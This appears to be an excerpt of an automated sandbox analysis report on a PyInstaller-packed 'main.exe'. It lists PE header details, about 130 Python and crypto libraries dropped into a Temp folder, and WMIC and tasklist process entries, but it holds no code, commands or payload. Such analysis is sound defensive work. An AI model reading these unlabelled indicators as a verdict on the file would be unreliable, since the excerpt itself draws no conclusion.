Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140.amd64.pdbGCTL source: main.exe, 00000000.00000003.1730126342.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\python3.pdb source: main.exe, 00000002.00000002.1952863479.000001ED8BCB0000.00000002.00000001.01000000.00000006.sdmp
Source: Binary string: D:\a\1\b\bin\amd64\_multiprocessing.pdb source: main.exe, 00000000.00000003.1733477188.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: Binary string: D:\a\_work\1\s\binaries\amd64ret\bin\amd64\\vcruntime140_1.amd64.pdbGCTL source: main.exe, 00000000.00000003.1730318775.00000237BBB32000.00000004.00000020.00020000.00000000.sdmp
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
Source: main.exeStatic PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata
Source: VCRUNTIME140_1.dll.0.drStatic PE information: 0xFB76EAA0 [Mon Sep 10 13:35:28 2103 UTC]
Source: libcrypto-3-x64.dll.0.drStatic PE information: section name: .00cfg
Source: libcrypto-3.dll.0.drStatic PE information: section name: .00cfg
Source: libssl-3.dll.0.drStatic PE information: section name: .00cfg
Source: legacy.dll.0.drStatic PE information: section name: .00cfg
Source: mfc140u.dll.0.drStatic PE information: section name: .didat
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: fothk
Source: VCRUNTIME140.dll.0.drStatic PE information: section name: _RDATA
Source: python311.dll.0.drStatic PE information: section name: PyRuntim

Persistence and Installation Behavior

Source: C:\Users\user\Desktop\main.exeProcess created: "C:\Users\user\Desktop\main.exe"
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140_1.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32com\shell\shell.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\VCRUNTIME140.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\sqlite3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pywintypes311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3-x64.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libssl-3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libffi-8.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_webp.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\ossl-modules\legacy.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_multiprocessing.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_cpuid_c.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve25519.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA512.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aes.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_elementtree.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\backend_c.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ocb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pythoncom311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Protocol\_scrypt.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ecb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingtk.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_clmul.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\python311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Math\_modexp.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\markupsafe\_speedups.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cast.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cbc.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_RIPEMD160.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_eksblowfish.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\win32ui.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2s.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed25519.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_arc2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeFile created: C:\Users\user\AppData\Local\Temp\_MEI44642\MarkupSafe-3.0.2.dist-info\LICENSE.txtJump to behavior
Source: C:\Users\user\Desktop\main.exeCode function: 0_2_00007FF6ABA44C40 GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,GetProcAddress,GetLastError,0_2_00007FF6ABA44C40
Source: C:\Users\user\Desktop\main.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\wbem\WMIC.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_asyncio.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\_win32sysloader.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD5.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_bz2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA256.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_portable.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32com\shell\shell.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\python3.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_hashlib.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md__mypyc.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\charset_normalizer\md.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_ARC4.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Pythonwin\mfc140u.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\cryptography\hazmat\bindings\_rust.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32api.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingcms.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_uuid.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_pkcs1_decode.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_decimal.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imaging.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingmath.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\win32\win32trace.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_brotli.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pywintypes311.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\libcrypto-3-x64.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\pyexpat.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\_cffi.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA1.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_queue.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ed448.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_sqlite3.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_webp.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_des.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\ossl-modules\legacy.dllJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_cffi_backend.cp311-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_blowfish.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_multiprocessing.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Util\_cpuid_c.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_curve25519.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA512.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\select.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\unicodedata.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aesni.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_elementtree.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_aes.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_SHA224.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\pywin32_system32\pythoncom311.dll
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\zstandard\backend_c.cp311-win_amd64.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ctypes.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ocb.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Protocol\_scrypt.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\_ssl.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ecb.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\PIL\_imagingtk.cp311-win_amd64.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_ghash_clmul.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_ofb.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\python311.dll
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Math\_modexp.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\PublicKey\_ec_ws.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cast.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\markupsafe\_speedups.cp311-win_amd64.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Cipher\_raw_cbc.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_RIPEMD160.pyd
Source: C:\Users\user\Desktop\main.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI44642\Crypto\Hash\_MD4.pyd
